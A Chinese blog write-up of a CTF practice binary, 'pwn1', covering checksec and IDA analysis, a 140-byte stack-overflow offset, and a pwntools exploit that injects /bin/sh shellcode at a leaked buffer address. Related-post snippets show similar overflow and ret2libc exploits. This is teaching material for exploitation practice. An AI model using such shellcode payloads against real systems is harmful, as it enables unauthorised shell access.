习题--pwn1

最新推荐文章于 2025-03-30 19:47:24 发布
最新推荐文章于 2025-03-30 19:47:24 发布
阅读量181 收藏
点赞数
分类专栏: CTF-PWN-刷题-XMCVE培训课 文章标签: 小程序 PWN 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_49959202/article/details/120365200
版权
该博客详细分析了32位程序pwn1,通过file、checksec、ida等工具揭示了程序的栈可执行特性。主要讨论了main函数中vulnerable_function()如何导致栈溢出,并利用printh函数泄露buf地址来布置shellcode。最终确定需要淹没140字节以执行shellcode,并概述了栈帧设计和exploit编写步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

pwn1

1.程序分析

首先file一下,发现是32位程序:

checksec一下,发现栈段可以执行:

ida分析,main函数内部调用了vulnerable_function(),可以用来栈溢出:

同时发现上面的printh可以用来泄露buf的地址,因此可以将shellcode填上buf处,然后根据泄露的地址再跳回来执行shellcode

程序一下,可以查看到泄露的buf地址:

gdb调试发现需要淹没的长度为: 0 x f f f f d 2 d 8 − 0 x f f f f d 250 + 4 = 140 0xffffd2d8-0xffffd250+4 = 140 0xffffd2d80xffffd250+4=140

2.栈帧设计

基于上述思路,栈帧如下:

3.exp编写

from pwn import *

shellcode = asm(shellcraft.sh())
io = process("/mnt/d/study/ctf/pwn/pwn1/level1")
buf = int(io.recvline()[14:-2], 16)
payload = shellcode + cyclic(140 - len(shellcode)) + p32(buf)

io.sendline(payload)
io.interactive()
习题--pwn3
m0_49959202的博客
09-20 1166
文章目录pwn31.程序分析2.栈帧设计3.exp编写 pwn3 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现pie没开: ldd一下,找到使用的动态链接库: ida分析,发现存在函数vulnerable_function(),可以用来栈溢出 题目给出了一个.so文件,那么只需要泄露got表内容,就可以得到system()函数的真实地址。bin_sh字符串也可以到libc里面寻找。 发现write()函数在read()函数前被调用,因此可以使用write()将writ
习题-pwn0
m0_49959202的博客
09-18 239
文章目录pwn01.程序分析2.栈帧设计3.exp编写 pwn0 1.程序分析 首先file一下,发现是64位程序: checksec一下,发现没有pie ida分析: 存在read函数,可以栈溢出利用。 同时,发现存在callsystem()函数,可以直接获取shell: 这就和ret2text一样了。 gdb计算需要覆盖的长度为60。 但是因为本机环境是ubuntu20.04,64位程序的system("/bin/sh")需要堆栈平衡 因此加上一个ret:0x00000000004005A5
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn 1
2303_80471032的博客
02-01 1711
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。
攻防世界 pwn1
最新发布
2401_85052854的博客
03-30 472
因为canary是通过逆字节存储,而且最后一个字节为\x00,由于puts遇到\x00会进行截断,所以我们用\n来进行覆盖,这里使用sendline所以自带\n不用自己加上去,因为是逆字节存储,所以是用rjust啊啊啊啊,死脑子快记住,因为没记住,在这里卡了好久,泄露完canary之后就是常规的泄露libc了,这里直接给出完整exp。一目了然,输入1就是read栈溢出,输入2就是把刚刚输入的进行打印,看看程序开了什么保护。
pwn1
u014281987的博客
08-27 1017
坑:记住是/bin/sh,不是bin/sh啊啊啊 这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用 from pwn import * io=
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
pwn1 一道pwn习题
05-07
pwn习题
pwn1(xctf)
weixin_43868725的博客
08-08 555
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
xctf pwn1
qq_41071646的博客
05-14 1029
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
PWN1|WP
l2645470582_的博客
04-11 771
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
pwn--攻防世界 pwn1
A13837377363的博客
04-04 608
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
CTFshow PWN1
qq_60737948的博客
10-03 204
pwn开始的地方
攻防世界pwn——pwn1
qq_62076255的博客
12-21 617
做题记录
pwn1第一关
qq_18823653的博客
03-28 501
检查程序,发现是32位,开了NX保护 拖入ida32 get()存在溢出,gdb调试 偏移112字节后覆盖返回地址,程序本身有调用system函数, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive(...
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值